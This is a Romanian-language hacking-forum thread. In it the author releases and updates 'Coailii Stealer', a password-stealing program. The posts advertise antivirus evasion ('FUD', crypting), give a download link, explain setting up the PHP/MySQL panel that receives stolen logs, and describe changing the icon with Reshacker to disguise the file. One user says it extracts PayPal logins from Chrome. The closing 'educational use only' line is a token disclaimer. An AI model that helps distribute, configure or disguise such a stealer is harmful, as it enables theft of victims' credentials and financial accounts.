Jump to content
Byte-ul

Coailii Password Recovery

Recommended Posts

Update 1.2:

ReFUD (adica e detectat doar de Avira. fiind moca, sa nu va aud ca va plangeti).

Poate fi cryptat acum (cred, am schimbat metoda de stocare, de acolo si detectia de la Avira)

Suporta Opera ultima versiune.

Download: Coailii Stealer.exe — RGhost — file sharing sau apasati butonul Update.

Link to comment
Share on other sites

De ce nu ai pus functia de change icon in Coailii Stealer? In rest nu am ce baga de vina merge totul super ok daca stii cum sa il configurezi, dar are cateva buguri panelul cand e gol imi arata niste errori cu tot cu scripturile din dashboard ceva de genul:

Notice: Undefined variable: row in /home/u653050845/public_html/dashboard.php on line 40 There are no logs Notice: Undefined index: delete-id in /home/u653050845/public_html/dashboard.php on line 120 Notice: Undefined index: a in /home/u653050845/public_html/dashboard.php on line 127

Ai fi putut sa bagi si optiunea de test sa vada lumea daca l-a configurat corect sa vada daca totusi ajung logurile pe aceea baza de date.

Cum pot schimba iconita stealer-ului creat, cu ce soft pot face asta? :)

Link to comment
Share on other sites

De ce nu ai pus functia de change icon in Coailii Stealer? In rest nu am ce baga de vina merge totul super ok daca stii cum sa il configurezi, dar are cateva buguri panelul cand e gol imi arata niste errori cu tot cu scripturile din dashboard ceva de genul:

Notice: Undefined variable: row in /home/u653050845/public_html/dashboard.php on line 40 There are no logs Notice: Undefined index: delete-id in /home/u653050845/public_html/dashboard.php on line 120 Notice: Undefined index: a in /home/u653050845/public_html/dashboard.php on line 127

Ai fi putut sa bagi si optiunea de test sa vada lumea daca l-a configurat corect sa vada daca totusi ajung logurile pe aceea baza de date.

Cum pot schimba iconita stealer-ului creat, cu ce soft pot face asta? :)

Poti schimba assembly si iconita cu Reshacker.

Pentru test, il rulati pe voi.

Chestiile din Panel nu sunt erori, ci atentionari (warnings)

Edit: se pare ca nu se poate schimba iconita (cel putin la mine nu merge)

O sa fixez asta in update-ul urmator :D

Edit: Update 1.3

Merge schimbata iconita

Nu mai e detectat de avira, dar e detectat de eset si ikarus.

Edited by Byte-ul
Link to comment
Share on other sites

Nu imi zice si mie nimeni dc imi da eroarea aia ? am copiat toate fisierele !

pai pot doar sa banuiesc ca nu ai modificat nici un .php in care sa pui bazele de date mysql si posibil nici nu ai creat nici o baza de date intai si probabil nu merge configul si nu cred ca tre sa rulezi install cred ca ar fi de ajuns doar index.php .... sa ma corecteze restu daca gresesc ...

working, merge pe chrome scoate inclusiv ppl cred ca ar merge sa ruleze automat o data pe zi ar fi ceva interesant :P

Edited by jayluc
Link to comment
Share on other sites

pai pot doar sa banuiesc ca nu ai modificat nici un .php in care sa pui bazele de date mysql si posibil nici nu ai creat nici o baza de date intai si probabil nu merge configul si nu cred ca tre sa rulezi install cred ca ar fi de ajuns doar index.php .... sa ma corecteze restu daca gresesc ...

working, merge pe chrome scoate inclusiv ppl cred ca ar merge sa ruleze automat o data pe zi ar fi ceva interesant :P

Ai atata timp pe forum si vezi ca nu e tolerat cardingul si tu scuipi ca scoate conturi de paypal.Daca te intereseaza chestiile alea, macar mergi inchis.

Pe de o parte chiar nici nu stiu cum e tolerat stealerul asta pe forum.Presupun ca nimeni nu vrea sa scoata cu el loginuri pe retedelabunica.com.

Link to comment
Share on other sites

Ai atata timp pe forum si vezi ca nu e tolerat cardingul si tu scuipi ca scoate conturi de paypal.Daca te intereseaza chestiile alea, macar mergi inchis.

Pe de o parte chiar nici nu stiu cum e tolerat stealerul asta pe forum.Presupun ca nimeni nu vrea sa scoata cu el loginuri pe retedelabunica.com.

Acest program poate fi folosit numai in scopuri educative. Il puteti folosi pe calculatoarele voastre pentru a verifica ce informatii pot fi compromise in urma unui astfel de atac.

Link to comment
Share on other sites

Ai atata timp pe forum si vezi ca nu e tolerat cardingul si tu scuipi ca scoate conturi de paypal.Daca te intereseaza chestiile alea, macar mergi inchis.

Pe de o parte chiar nici nu stiu cum e tolerat stealerul asta pe forum.Presupun ca nimeni nu vrea sa scoata cu el loginuri pe retedelabunica.com.

Ai perfecta dreptate, nici eu nu sunt de acord cu cardingul mai ales de cei care stau toata ziua cu 2 programe deschise in fata si scriu niste plastice, greseala mea a fost in exprimare, vroiam doar sa accentuez ca un program relativ mic poate face niste chestii mari si serioase, mai ales referitor la cei care intra aici si pun intrebari de genu de ce imi da aia da de ce aia da cum aia mura-n gura, imi cer scuze daca s-a inteles altceva din postu ala

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...